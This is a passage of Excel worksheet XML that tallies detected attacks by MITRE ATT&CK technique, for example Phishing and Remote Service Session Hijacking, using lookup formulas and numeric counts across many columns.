        <f>IFERROR(VLOOKUP(B54,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Pre-OS Boot</v>
      </c>
      <c r="D54" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B54)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E54" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F54" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (13)</v>
      </c>
      <c r="G54" s="292">
        <v>14</v>
      </c>
      <c r="H54" s="322">
        <v>3</v>
      </c>
      <c r="I54" s="322">
        <v>0</v>
      </c>
      <c r="J54" s="12">
        <v>3</v>
      </c>
      <c r="K54" s="13">
        <v>1</v>
      </c>
      <c r="L54" s="394">
        <v>2</v>
      </c>
      <c r="M54" s="322">
        <v>98</v>
      </c>
      <c r="N54" s="322">
        <v>6</v>
      </c>
      <c r="O54" s="322">
        <v>0</v>
      </c>
      <c r="P54" s="12">
        <v>5</v>
      </c>
      <c r="Q54" s="13">
        <v>1</v>
      </c>
      <c r="R54" s="394">
        <v>3</v>
      </c>
      <c r="S54" s="292">
        <v>112</v>
      </c>
      <c r="T54" s="322">
        <v>9</v>
      </c>
      <c r="U54" s="322">
        <v>0</v>
      </c>
      <c r="V54" s="12">
        <v>8</v>
      </c>
      <c r="W54" s="13">
        <v>1</v>
      </c>
      <c r="X54" s="394">
        <v>4</v>
      </c>
      <c r="Y54" s="392">
        <v>1699</v>
      </c>
      <c r="Z54" s="392">
        <v>21</v>
      </c>
      <c r="AA54" s="322">
        <v>0</v>
      </c>
      <c r="AB54" s="392">
        <v>19</v>
      </c>
      <c r="AC54" s="16">
        <v>1</v>
      </c>
      <c r="AD54" s="394">
        <v>7</v>
      </c>
      <c r="AE54" s="392">
        <v>3410</v>
      </c>
      <c r="AF54" s="392">
        <v>20</v>
      </c>
      <c r="AG54" s="322">
        <v>0</v>
      </c>
      <c r="AH54" s="392">
        <v>12</v>
      </c>
      <c r="AI54" s="16">
        <v>1</v>
      </c>
      <c r="AJ54" s="394">
        <v>8</v>
      </c>
      <c r="AK54" s="392">
        <v>5109</v>
      </c>
      <c r="AL54" s="392">
        <v>41</v>
      </c>
      <c r="AM54" s="322">
        <v>0</v>
      </c>
      <c r="AN54" s="392">
        <v>31</v>
      </c>
      <c r="AO54" s="16">
        <v>1</v>
      </c>
      <c r="AP54" s="394">
        <v>8</v>
      </c>
      <c r="AQ54" s="292">
        <v>0</v>
      </c>
      <c r="AR54" s="322">
        <v>0</v>
      </c>
      <c r="AS54" s="322">
        <v>0</v>
      </c>
      <c r="AT54" s="12">
        <v>0</v>
      </c>
      <c r="AU54" s="13">
        <v>0</v>
      </c>
      <c r="AV54" s="394">
        <v>0</v>
      </c>
      <c r="AW54" s="392">
        <v>8</v>
      </c>
      <c r="AX54" s="392">
        <v>5</v>
      </c>
      <c r="AY54" s="322">
        <v>0</v>
      </c>
      <c r="AZ54" s="4">
        <v>4</v>
      </c>
      <c r="BA54" s="16">
        <v>1</v>
      </c>
      <c r="BB54" s="394">
        <v>4</v>
      </c>
      <c r="BC54" s="292">
        <v>120</v>
      </c>
      <c r="BD54" s="322">
        <v>14</v>
      </c>
      <c r="BE54" s="322">
        <v>0</v>
      </c>
      <c r="BF54" s="12">
        <v>12</v>
      </c>
      <c r="BG54" s="13">
        <v>1</v>
      </c>
      <c r="BH54" s="394">
        <v>4</v>
      </c>
      <c r="BI54" s="292">
        <v>3</v>
      </c>
      <c r="BJ54" s="322">
        <v>2</v>
      </c>
      <c r="BK54" s="322">
        <v>0</v>
      </c>
      <c r="BL54" s="12">
        <v>1</v>
      </c>
      <c r="BM54" s="13">
        <v>1</v>
      </c>
      <c r="BN54" s="394">
        <v>2</v>
      </c>
      <c r="BO54" s="292">
        <v>8</v>
      </c>
      <c r="BP54" s="322">
        <v>7</v>
      </c>
      <c r="BQ54" s="322">
        <v>0</v>
      </c>
      <c r="BR54" s="12">
        <v>1</v>
      </c>
      <c r="BS54" s="12">
        <v>4</v>
      </c>
      <c r="BT54" s="13">
        <v>1</v>
      </c>
      <c r="BU54" s="394">
        <v>5</v>
      </c>
      <c r="BV54" s="292">
        <v>0</v>
      </c>
      <c r="BW54" s="322">
        <v>0</v>
      </c>
      <c r="BX54" s="322">
        <v>0</v>
      </c>
      <c r="BY54" s="12">
        <v>0</v>
      </c>
      <c r="BZ54" s="13">
        <v>0</v>
      </c>
      <c r="CA54" s="394">
        <v>0</v>
      </c>
      <c r="CB54" s="292">
        <v>2</v>
      </c>
      <c r="CC54" s="322">
        <v>2</v>
      </c>
      <c r="CD54" s="322">
        <v>0</v>
      </c>
      <c r="CE54" s="12">
        <v>0</v>
      </c>
      <c r="CF54" s="12">
        <v>1</v>
      </c>
      <c r="CG54" s="13">
        <v>1</v>
      </c>
      <c r="CH54" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="55" spans="1:86" ht="15" customHeight="1">
      <c r="A55" s="4">
        <f t="shared" si="0"/>
        <v>53</v>
      </c>
      <c r="B55" s="4" t="str">
        <f>IFERROR(VLOOKUP(A55,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1543</v>
      </c>
      <c r="C55" s="493" t="str">
        <f>IFERROR(VLOOKUP(B55,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Create or Modify System Process</v>
      </c>
      <c r="D55" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B55)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E55" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F55" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (3)</v>
      </c>
      <c r="G55" s="292">
        <v>16</v>
      </c>
      <c r="H55" s="322">
        <v>6</v>
      </c>
      <c r="I55" s="322">
        <v>0</v>
      </c>
      <c r="J55" s="12">
        <v>3</v>
      </c>
      <c r="K55" s="13">
        <v>1</v>
      </c>
      <c r="L55" s="394">
        <v>2</v>
      </c>
      <c r="M55" s="322">
        <v>8</v>
      </c>
      <c r="N55" s="322">
        <v>6</v>
      </c>
      <c r="O55" s="322">
        <v>0</v>
      </c>
      <c r="P55" s="12">
        <v>3</v>
      </c>
      <c r="Q55" s="13">
        <v>1</v>
      </c>
      <c r="R55" s="394">
        <v>2</v>
      </c>
      <c r="S55" s="292">
        <v>24</v>
      </c>
      <c r="T55" s="322">
        <v>12</v>
      </c>
      <c r="U55" s="322">
        <v>0</v>
      </c>
      <c r="V55" s="12">
        <v>6</v>
      </c>
      <c r="W55" s="13">
        <v>1</v>
      </c>
      <c r="X55" s="394">
        <v>2</v>
      </c>
      <c r="Y55" s="392">
        <v>23</v>
      </c>
      <c r="Z55" s="392">
        <v>11</v>
      </c>
      <c r="AA55" s="322">
        <v>0</v>
      </c>
      <c r="AB55" s="392">
        <v>6</v>
      </c>
      <c r="AC55" s="16">
        <v>1</v>
      </c>
      <c r="AD55" s="394">
        <v>3</v>
      </c>
      <c r="AE55" s="392">
        <v>16</v>
      </c>
      <c r="AF55" s="392">
        <v>10</v>
      </c>
      <c r="AG55" s="322">
        <v>0</v>
      </c>
      <c r="AH55" s="392">
        <v>6</v>
      </c>
      <c r="AI55" s="16">
        <v>1</v>
      </c>
      <c r="AJ55" s="394">
        <v>2</v>
      </c>
      <c r="AK55" s="392">
        <v>39</v>
      </c>
      <c r="AL55" s="392">
        <v>21</v>
      </c>
      <c r="AM55" s="322">
        <v>0</v>
      </c>
      <c r="AN55" s="392">
        <v>12</v>
      </c>
      <c r="AO55" s="16">
        <v>1</v>
      </c>
      <c r="AP55" s="394">
        <v>3</v>
      </c>
      <c r="AQ55" s="292">
        <v>0</v>
      </c>
      <c r="AR55" s="322">
        <v>0</v>
      </c>
      <c r="AS55" s="322">
        <v>0</v>
      </c>
      <c r="AT55" s="12">
        <v>0</v>
      </c>
      <c r="AU55" s="13">
        <v>0</v>
      </c>
      <c r="AV55" s="394">
        <v>0</v>
      </c>
      <c r="AW55" s="392">
        <v>0</v>
      </c>
      <c r="AX55" s="392">
        <v>0</v>
      </c>
      <c r="AY55" s="322">
        <v>0</v>
      </c>
      <c r="AZ55" s="4">
        <v>0</v>
      </c>
      <c r="BA55" s="16">
        <v>0</v>
      </c>
      <c r="BB55" s="394">
        <v>0</v>
      </c>
      <c r="BC55" s="292">
        <v>24</v>
      </c>
      <c r="BD55" s="322">
        <v>12</v>
      </c>
      <c r="BE55" s="322">
        <v>0</v>
      </c>
      <c r="BF55" s="12">
        <v>6</v>
      </c>
      <c r="BG55" s="13">
        <v>1</v>
      </c>
      <c r="BH55" s="394">
        <v>2</v>
      </c>
      <c r="BI55" s="292">
        <v>5</v>
      </c>
      <c r="BJ55" s="322">
        <v>3</v>
      </c>
      <c r="BK55" s="322">
        <v>0</v>
      </c>
      <c r="BL55" s="12">
        <v>2</v>
      </c>
      <c r="BM55" s="13">
        <v>1</v>
      </c>
      <c r="BN55" s="394">
        <v>2</v>
      </c>
      <c r="BO55" s="292">
        <v>6</v>
      </c>
      <c r="BP55" s="322">
        <v>4</v>
      </c>
      <c r="BQ55" s="322">
        <v>0</v>
      </c>
      <c r="BR55" s="12">
        <v>2</v>
      </c>
      <c r="BS55" s="12">
        <v>1</v>
      </c>
      <c r="BT55" s="13">
        <v>1</v>
      </c>
      <c r="BU55" s="394">
        <v>3</v>
      </c>
      <c r="BV55" s="292">
        <v>0</v>
      </c>
      <c r="BW55" s="322">
        <v>0</v>
      </c>
      <c r="BX55" s="322">
        <v>0</v>
      </c>
      <c r="BY55" s="12">
        <v>0</v>
      </c>
      <c r="BZ55" s="13">
        <v>0</v>
      </c>
      <c r="CA55" s="394">
        <v>0</v>
      </c>
      <c r="CB55" s="292">
        <v>0</v>
      </c>
      <c r="CC55" s="322">
        <v>0</v>
      </c>
      <c r="CD55" s="322">
        <v>0</v>
      </c>
      <c r="CE55" s="12">
        <v>0</v>
      </c>
      <c r="CF55" s="12">
        <v>0</v>
      </c>
      <c r="CG55" s="13">
        <v>0</v>
      </c>
      <c r="CH55" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:86" ht="15" customHeight="1">
      <c r="A56" s="4">
        <f t="shared" si="0"/>
        <v>54</v>
      </c>
      <c r="B56" s="4" t="str">
        <f>IFERROR(VLOOKUP(A56,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1557</v>
      </c>
      <c r="C56" s="493" t="str">
        <f>IFERROR(VLOOKUP(B56,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Adversary-in-the-Middle</v>
      </c>
      <c r="D56" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B56)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E56" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F56" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (5)</v>
      </c>
      <c r="G56" s="292">
        <v>0</v>
      </c>
      <c r="H56" s="322">
        <v>0</v>
      </c>
      <c r="I56" s="322">
        <v>0</v>
      </c>
      <c r="J56" s="12">
        <v>0</v>
      </c>
      <c r="K56" s="13">
        <v>0</v>
      </c>
      <c r="L56" s="394">
        <v>0</v>
      </c>
      <c r="M56" s="322">
        <v>0</v>
      </c>
      <c r="N56" s="322">
        <v>0</v>
      </c>
      <c r="O56" s="322">
        <v>0</v>
      </c>
      <c r="P56" s="12">
        <v>0</v>
      </c>
      <c r="Q56" s="13">
        <v>0</v>
      </c>
      <c r="R56" s="394">
        <v>0</v>
      </c>
      <c r="S56" s="292">
        <v>0</v>
      </c>
      <c r="T56" s="322">
        <v>0</v>
      </c>
      <c r="U56" s="322">
        <v>0</v>
      </c>
      <c r="V56" s="12">
        <v>0</v>
      </c>
      <c r="W56" s="13">
        <v>0</v>
      </c>
      <c r="X56" s="394">
        <v>0</v>
      </c>
      <c r="Y56" s="392">
        <v>2</v>
      </c>
      <c r="Z56" s="392">
        <v>1</v>
      </c>
      <c r="AA56" s="322">
        <v>0</v>
      </c>
      <c r="AB56" s="392">
        <v>1</v>
      </c>
      <c r="AC56" s="16">
        <v>1</v>
      </c>
      <c r="AD56" s="394">
        <v>1</v>
      </c>
      <c r="AE56" s="392">
        <v>70</v>
      </c>
      <c r="AF56" s="392">
        <v>3</v>
      </c>
      <c r="AG56" s="322">
        <v>0</v>
      </c>
      <c r="AH56" s="392">
        <v>3</v>
      </c>
      <c r="AI56" s="16">
        <v>1</v>
      </c>
      <c r="AJ56" s="394">
        <v>2</v>
      </c>
      <c r="AK56" s="392">
        <v>72</v>
      </c>
      <c r="AL56" s="392">
        <v>4</v>
      </c>
      <c r="AM56" s="322">
        <v>0</v>
      </c>
      <c r="AN56" s="392">
        <v>4</v>
      </c>
      <c r="AO56" s="16">
        <v>1</v>
      </c>
      <c r="AP56" s="394">
        <v>2</v>
      </c>
      <c r="AQ56" s="292">
        <v>0</v>
      </c>
      <c r="AR56" s="322">
        <v>0</v>
      </c>
      <c r="AS56" s="322">
        <v>0</v>
      </c>
      <c r="AT56" s="12">
        <v>0</v>
      </c>
      <c r="AU56" s="13">
        <v>0</v>
      </c>
      <c r="AV56" s="394">
        <v>0</v>
      </c>
      <c r="AW56" s="392">
        <v>0</v>
      </c>
      <c r="AX56" s="392">
        <v>0</v>
      </c>
      <c r="AY56" s="322">
        <v>0</v>
      </c>
      <c r="AZ56" s="4">
        <v>0</v>
      </c>
      <c r="BA56" s="16">
        <v>0</v>
      </c>
      <c r="BB56" s="394">
        <v>0</v>
      </c>
      <c r="BC56" s="292">
        <v>0</v>
      </c>
      <c r="BD56" s="322">
        <v>0</v>
      </c>
      <c r="BE56" s="322">
        <v>0</v>
      </c>
      <c r="BF56" s="12">
        <v>0</v>
      </c>
      <c r="BG56" s="13">
        <v>0</v>
      </c>
      <c r="BH56" s="394">
        <v>0</v>
      </c>
      <c r="BI56" s="292">
        <v>0</v>
      </c>
      <c r="BJ56" s="322">
        <v>0</v>
      </c>
      <c r="BK56" s="322">
        <v>0</v>
      </c>
      <c r="BL56" s="12">
        <v>0</v>
      </c>
      <c r="BM56" s="13">
        <v>0</v>
      </c>
      <c r="BN56" s="394">
        <v>0</v>
      </c>
      <c r="BO56" s="292">
        <v>6</v>
      </c>
      <c r="BP56" s="322">
        <v>6</v>
      </c>
      <c r="BQ56" s="322">
        <v>0</v>
      </c>
      <c r="BR56" s="12">
        <v>0</v>
      </c>
      <c r="BS56" s="12">
        <v>4</v>
      </c>
      <c r="BT56" s="13">
        <v>1</v>
      </c>
      <c r="BU56" s="394">
        <v>6</v>
      </c>
      <c r="BV56" s="292">
        <v>0</v>
      </c>
      <c r="BW56" s="322">
        <v>0</v>
      </c>
      <c r="BX56" s="322">
        <v>0</v>
      </c>
      <c r="BY56" s="12">
        <v>0</v>
      </c>
      <c r="BZ56" s="13">
        <v>0</v>
      </c>
      <c r="CA56" s="394">
        <v>0</v>
      </c>
      <c r="CB56" s="292">
        <v>0</v>
      </c>
      <c r="CC56" s="322">
        <v>0</v>
      </c>
      <c r="CD56" s="322">
        <v>0</v>
      </c>
      <c r="CE56" s="12">
        <v>0</v>
      </c>
      <c r="CF56" s="12">
        <v>0</v>
      </c>
      <c r="CG56" s="13">
        <v>0</v>
      </c>
      <c r="CH56" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:86" ht="15" customHeight="1">
      <c r="A57" s="4">
        <f t="shared" si="0"/>
        <v>55</v>
      </c>
      <c r="B57" s="4" t="str">
        <f>IFERROR(VLOOKUP(A57,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1563</v>
      </c>
      <c r="C57" s="493" t="str">
        <f>IFERROR(VLOOKUP(B57,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Service Session Hijacking</v>
      </c>
      <c r="D57" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B57)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E57" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>97</v>
      </c>
      <c r="F57" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (97)</v>
      </c>
      <c r="G57" s="292">
        <v>199</v>
      </c>
      <c r="H57" s="322">
        <v>43</v>
      </c>
      <c r="I57" s="322">
        <v>0</v>
      </c>
      <c r="J57" s="12">
        <v>3</v>
      </c>
      <c r="K57" s="13">
        <v>1</v>
      </c>
      <c r="L57" s="394">
        <v>27</v>
      </c>
      <c r="M57" s="322">
        <v>18</v>
      </c>
      <c r="N57" s="322">
        <v>18</v>
      </c>
      <c r="O57" s="322">
        <v>0</v>
      </c>
      <c r="P57" s="12">
        <v>2</v>
      </c>
      <c r="Q57" s="13">
        <v>1</v>
      </c>
      <c r="R57" s="394">
        <v>17</v>
      </c>
      <c r="S57" s="292">
        <v>217</v>
      </c>
      <c r="T57" s="322">
        <v>61</v>
      </c>
      <c r="U57" s="322">
        <v>0</v>
      </c>
      <c r="V57" s="12">
        <v>5</v>
      </c>
      <c r="W57" s="13">
        <v>1</v>
      </c>
      <c r="X57" s="394">
        <v>34</v>
      </c>
      <c r="Y57" s="392">
        <v>228</v>
      </c>
      <c r="Z57" s="392">
        <v>67</v>
      </c>
      <c r="AA57" s="322">
        <v>0</v>
      </c>
      <c r="AB57" s="392">
        <v>11</v>
      </c>
      <c r="AC57" s="16">
        <v>1</v>
      </c>
      <c r="AD57" s="394">
        <v>36</v>
      </c>
      <c r="AE57" s="392">
        <v>93</v>
      </c>
      <c r="AF57" s="392">
        <v>85</v>
      </c>
      <c r="AG57" s="322">
        <v>0</v>
      </c>
      <c r="AH57" s="392">
        <v>17</v>
      </c>
      <c r="AI57" s="16">
        <v>1</v>
      </c>
      <c r="AJ57" s="394">
        <v>25</v>
      </c>
      <c r="AK57" s="392">
        <v>321</v>
      </c>
      <c r="AL57" s="392">
        <v>152</v>
      </c>
      <c r="AM57" s="322">
        <v>0</v>
      </c>
      <c r="AN57" s="392">
        <v>28</v>
      </c>
      <c r="AO57" s="16">
        <v>1</v>
      </c>
      <c r="AP57" s="394">
        <v>42</v>
      </c>
      <c r="AQ57" s="292">
        <v>0</v>
      </c>
      <c r="AR57" s="322">
        <v>0</v>
      </c>
      <c r="AS57" s="322">
        <v>0</v>
      </c>
      <c r="AT57" s="12">
        <v>0</v>
      </c>
      <c r="AU57" s="13">
        <v>0</v>
      </c>
      <c r="AV57" s="394">
        <v>0</v>
      </c>
      <c r="AW57" s="392">
        <v>23</v>
      </c>
      <c r="AX57" s="392">
        <v>18</v>
      </c>
      <c r="AY57" s="322">
        <v>0</v>
      </c>
      <c r="AZ57" s="4">
        <v>2</v>
      </c>
      <c r="BA57" s="16">
        <v>1</v>
      </c>
      <c r="BB57" s="394">
        <v>18</v>
      </c>
      <c r="BC57" s="292">
        <v>240</v>
      </c>
      <c r="BD57" s="322">
        <v>79</v>
      </c>
      <c r="BE57" s="322">
        <v>0</v>
      </c>
      <c r="BF57" s="12">
        <v>7</v>
      </c>
      <c r="BG57" s="13">
        <v>1</v>
      </c>
      <c r="BH57" s="394">
        <v>35</v>
      </c>
      <c r="BI57" s="292">
        <v>16</v>
      </c>
      <c r="BJ57" s="322">
        <v>16</v>
      </c>
      <c r="BK57" s="322">
        <v>0</v>
      </c>
      <c r="BL57" s="12">
        <v>1</v>
      </c>
      <c r="BM57" s="13">
        <v>1</v>
      </c>
      <c r="BN57" s="394">
        <v>16</v>
      </c>
      <c r="BO57" s="292">
        <v>107</v>
      </c>
      <c r="BP57" s="322">
        <v>106</v>
      </c>
      <c r="BQ57" s="322">
        <v>0</v>
      </c>
      <c r="BR57" s="12">
        <v>1</v>
      </c>
      <c r="BS57" s="12">
        <v>12</v>
      </c>
      <c r="BT57" s="13">
        <v>1</v>
      </c>
      <c r="BU57" s="394">
        <v>89</v>
      </c>
      <c r="BV57" s="292">
        <v>0</v>
      </c>
      <c r="BW57" s="322">
        <v>0</v>
      </c>
      <c r="BX57" s="322">
        <v>0</v>
      </c>
      <c r="BY57" s="12">
        <v>0</v>
      </c>
      <c r="BZ57" s="13">
        <v>0</v>
      </c>
      <c r="CA57" s="394">
        <v>0</v>
      </c>
      <c r="CB57" s="292">
        <v>4</v>
      </c>
      <c r="CC57" s="322">
        <v>4</v>
      </c>
      <c r="CD57" s="322">
        <v>0</v>
      </c>
      <c r="CE57" s="12">
        <v>0</v>
      </c>
      <c r="CF57" s="12">
        <v>1</v>
      </c>
      <c r="CG57" s="13">
        <v>1</v>
      </c>
      <c r="CH57" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="58" spans="1:86" ht="15" customHeight="1">
      <c r="A58" s="4">
        <f t="shared" si="0"/>
        <v>56</v>
      </c>
      <c r="B58" s="4" t="str">
        <f>IFERROR(VLOOKUP(A58,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1565</v>
      </c>
      <c r="C58" s="493" t="str">
        <f>IFERROR(VLOOKUP(B58,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Manipulation</v>
      </c>
      <c r="D58" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B58)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E58" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F58" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="G58" s="292">
        <v>0</v>
      </c>
      <c r="H58" s="322">
        <v>0</v>
      </c>
      <c r="I58" s="322">
        <v>0</v>
      </c>
      <c r="J58" s="12">
        <v>0</v>
      </c>
      <c r="K58" s="13">
        <v>0</v>
      </c>
      <c r="L58" s="394">
        <v>0</v>
      </c>
      <c r="M58" s="322">
        <v>0</v>
      </c>
      <c r="N58" s="322">
        <v>0</v>
      </c>
      <c r="O58" s="322">
        <v>0</v>
      </c>
      <c r="P58" s="12">
        <v>0</v>
      </c>
      <c r="Q58" s="13">
        <v>0</v>
      </c>
      <c r="R58" s="394">
        <v>0</v>
      </c>
      <c r="S58" s="292">
        <v>0</v>
      </c>
      <c r="T58" s="322">
        <v>0</v>
      </c>
      <c r="U58" s="322">
        <v>0</v>
      </c>
      <c r="V58" s="12">
        <v>0</v>
      </c>
      <c r="W58" s="13">
        <v>0</v>
      </c>
      <c r="X58" s="394">
        <v>0</v>
      </c>
      <c r="Y58" s="392">
        <v>1</v>
      </c>
      <c r="Z58" s="392">
        <v>1</v>
      </c>
      <c r="AA58" s="322">
        <v>0</v>
      </c>
      <c r="AB58" s="392">
        <v>1</v>
      </c>
      <c r="AC58" s="16">
        <v>1</v>
      </c>
      <c r="AD58" s="394">
        <v>1</v>
      </c>
      <c r="AE58" s="392">
        <v>4</v>
      </c>
      <c r="AF58" s="392">
        <v>2</v>
      </c>
      <c r="AG58" s="322">
        <v>0</v>
      </c>
      <c r="AH58" s="392">
        <v>2</v>
      </c>
      <c r="AI58" s="16">
        <v>1</v>
      </c>
      <c r="AJ58" s="394">
        <v>1</v>
      </c>
      <c r="AK58" s="392">
        <v>5</v>
      </c>
      <c r="AL58" s="392">
        <v>3</v>
      </c>
      <c r="AM58" s="322">
        <v>0</v>
      </c>
      <c r="AN58" s="392">
        <v>3</v>
      </c>
      <c r="AO58" s="16">
        <v>1</v>
      </c>
      <c r="AP58" s="394">
        <v>1</v>
      </c>
      <c r="AQ58" s="292">
        <v>0</v>
      </c>
      <c r="AR58" s="322">
        <v>0</v>
      </c>
      <c r="AS58" s="322">
        <v>0</v>
      </c>
      <c r="AT58" s="12">
        <v>0</v>
      </c>
      <c r="AU58" s="13">
        <v>0</v>
      </c>
      <c r="AV58" s="394">
        <v>0</v>
      </c>
      <c r="AW58" s="392">
        <v>0</v>
      </c>
      <c r="AX58" s="392">
        <v>0</v>
      </c>
      <c r="AY58" s="322">
        <v>0</v>
      </c>
      <c r="AZ58" s="4">
        <v>0</v>
      </c>
      <c r="BA58" s="16">
        <v>0</v>
      </c>
      <c r="BB58" s="394">
        <v>0</v>
      </c>
      <c r="BC58" s="292">
        <v>0</v>
      </c>
      <c r="BD58" s="322">
        <v>0</v>
      </c>
      <c r="BE58" s="322">
        <v>0</v>
      </c>
      <c r="BF58" s="12">
        <v>0</v>
      </c>
      <c r="BG58" s="13">
        <v>0</v>
      </c>
      <c r="BH58" s="394">
        <v>0</v>
      </c>
      <c r="BI58" s="292">
        <v>0</v>
      </c>
      <c r="BJ58" s="322">
        <v>0</v>
      </c>
      <c r="BK58" s="322">
        <v>0</v>
      </c>
      <c r="BL58" s="12">
        <v>0</v>
      </c>
      <c r="BM58" s="13">
        <v>0</v>
      </c>
      <c r="BN58" s="394">
        <v>0</v>
      </c>
      <c r="BO58" s="292">
        <v>1</v>
      </c>
      <c r="BP58" s="322">
        <v>1</v>
      </c>
      <c r="BQ58" s="322">
        <v>0</v>
      </c>
      <c r="BR58" s="12">
        <v>0</v>
      </c>
      <c r="BS58" s="12">
        <v>1</v>
      </c>
      <c r="BT58" s="13">
        <v>1</v>
      </c>
      <c r="BU58" s="394">
        <v>1</v>
      </c>
      <c r="BV58" s="292">
        <v>0</v>
      </c>
      <c r="BW58" s="322">
        <v>0</v>
      </c>
      <c r="BX58" s="322">
        <v>0</v>
      </c>
      <c r="BY58" s="12">
        <v>0</v>
      </c>
      <c r="BZ58" s="13">
        <v>0</v>
      </c>
      <c r="CA58" s="394">
        <v>0</v>
      </c>
      <c r="CB58" s="292">
        <v>0</v>
      </c>
      <c r="CC58" s="322">
        <v>0</v>
      </c>
      <c r="CD58" s="322">
        <v>0</v>
      </c>
      <c r="CE58" s="12">
        <v>0</v>
      </c>
      <c r="CF58" s="12">
        <v>0</v>
      </c>
      <c r="CG58" s="13">
        <v>0</v>
      </c>
      <c r="CH58" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:86" ht="15" customHeight="1">
      <c r="A59" s="4">
        <f t="shared" si="0"/>
        <v>57</v>
      </c>
      <c r="B59" s="4" t="str">
        <f>IFERROR(VLOOKUP(A59,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1566</v>
      </c>
      <c r="C59" s="493" t="str">
        <f>IFERROR(VLOOKUP(B59,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing</v>
      </c>
      <c r="D59" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B59)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E59" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>172</v>
      </c>
      <c r="F59" s="579" t="str">
        <f t="shared" si="1"/>
        <v>2 (172)</v>
      </c>
      <c r="G59" s="292">
        <v>1208</v>
      </c>
      <c r="H59" s="322">
        <v>12</v>
      </c>
      <c r="I59" s="322">
        <v>0</v>
      </c>
      <c r="J59" s="12">
        <v>3</v>
      </c>
      <c r="K59" s="13">
        <v>1</v>
      </c>
      <c r="L59" s="394">
        <v>7</v>
      </c>
      <c r="M59" s="322">
        <v>29</v>
      </c>
      <c r="N59" s="322">
        <v>28</v>
      </c>
      <c r="O59" s="322">
        <v>0</v>
      </c>
      <c r="P59" s="12">
        <v>6</v>
      </c>
      <c r="Q59" s="13">
        <v>0.5</v>
      </c>
      <c r="R59" s="394">
        <v>13</v>
      </c>
      <c r="S59" s="292">
        <v>1237</v>
      </c>
      <c r="T59" s="322">
        <v>40</v>
      </c>
      <c r="U59" s="322">
        <v>0</v>
      </c>
      <c r="V59" s="12">
        <v>9</v>
      </c>
      <c r="W59" s="13">
        <v>1</v>
      </c>
      <c r="X59" s="394">
        <v>20</v>
      </c>
      <c r="Y59" s="392">
        <v>1220</v>
      </c>
      <c r="Z59" s="392">
        <v>22</v>
      </c>
      <c r="AA59" s="322">
        <v>0</v>
      </c>
      <c r="AB59" s="392">
        <v>11</v>
      </c>
      <c r="AC59" s="16">
        <v>1</v>
      </c>
      <c r="AD59" s="394">
        <v>11</v>
      </c>
      <c r="AE59" s="392">
        <v>91</v>
      </c>
      <c r="AF59" s="392">
        <v>60</v>
      </c>
      <c r="AG59" s="322">
        <v>0</v>
